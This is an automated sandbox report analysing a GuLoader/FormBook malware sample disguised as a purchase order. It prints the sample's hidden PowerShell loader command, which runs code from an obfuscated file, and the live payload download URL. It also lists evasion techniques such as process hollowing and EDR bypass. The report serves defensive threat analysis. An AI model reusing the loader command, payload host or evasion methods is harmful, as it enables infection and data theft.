Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO Tournefortian2453525525235235623425523235.exe

Overview

General Information

Sample name:PO Tournefortian2453525525235235623425523235.exe
Analysis ID:1483268
MD5:d332bcaa3c61494b774f49bf3e716c21
SHA1:8cdfa60c6b3f25c7d48753e50c298b746c3386de
SHA256:d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Powershell drops PE file
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PO Tournefortian2453525525235235623425523235.exe (PID: 1764 cmdline: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe" MD5: D332BCAA3C61494B774F49BF3E716C21)
    • powershell.exe (PID: 6252 cmdline: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • Sammentrykket.exe (PID: 5076 cmdline: "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe" MD5: D332BCAA3C61494B774F49BF3E716C21)
        • RAVCpl64.exe (PID: 7476 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • WerFault.exe (PID: 6404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x8282e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x810dd1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x8282e2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x810dd1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Click to see the 1 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", CommandLine: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe", ParentImage: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe, ParentProcessId: 1764, ParentProcessName: PO Tournefortian2453525525235235623425523235.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)", ProcessId: 6252, ProcessName: powershell.exe

        Snort Signatures

        No Snort rule has matched

        Suricata Signatures

        Timestamp:2024-07-26T23:55:52.759567+0200
        SID:2803270
        Source Port:49778
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeReversingLabs: Detection: 28%
        Multi AV Scanner detection for submitted file
        Source: PO Tournefortian2453525525235235623425523235.exeReversingLabs: Detection: 28%
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.76790599173.0000000008B92000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Sammentrykket.exe, Sammentrykket.exe, 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77133628191.00000000205A0000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdb0 source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb316567-2969588382-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00406850 FindFirstFileW,FindClose,0_2_00406850
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C26
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /FPkXcnPDrjTal168.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: villa-ventura.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /FPkXcnPDrjTal168.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: villa-ventura.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: villa-ventura.com
        Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: PO Tournefortian2453525525235235623425523235.exe, 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO Tournefortian2453525525235235623425523235.exe, 00000000.00000000.76378317578.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
        Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
        Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000626000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
        Source: Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villa-ventura.com/
        Source: Sammentrykket.exe, 00000004.00000003.77136726603.00000000048A7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.00000000048A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.bin
        Source: Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://villa-ventura.com/FPkXcnPDrjTal168.binwt?
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownHTTPS traffic detected: 185.90.59.130:443 -> 192.168.11.20:49778 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209634E0 NtCreateMutant,LdrInitializeThunk,4_2_209634E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20962B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_20962B90
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20962BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_20962BC0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_20962D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_20962D10
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033C89302_2_033C8930
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033C80602_2_033C8060
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033C7D182_2_033C7D18
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07A7BEFE2_2_07A7BEFE
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209200A04_2_209200A0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2093B0D04_2_2093B0D0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209E70F14_2_209E70F1
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209DE0764_2_209DE076
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209351C04_2_209351C0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2094B1E04_2_2094B1E0
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091F1134_2_2091F113
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209F010E4_2_209F010E
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_209CD1304_2_209CD130
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2097717A4_2_2097717A
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeCode function: 4_2_2091D2EC4_2_2091D2EC
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/17@1/1
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeCode function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350A
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeFile created: C:\Users\user\AppData\Local\efterplaprernesJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5076
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeFile created: C:\Users\user\AppData\Local\Temp\nsyDC36.tmpJump to behavior
        Source: PO Tournefortian2453525525235235623425523235.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PO Tournefortian2453525525235235623425523235.exeReversingLabs: Detection: 28%
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeFile read: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
        Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe "C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
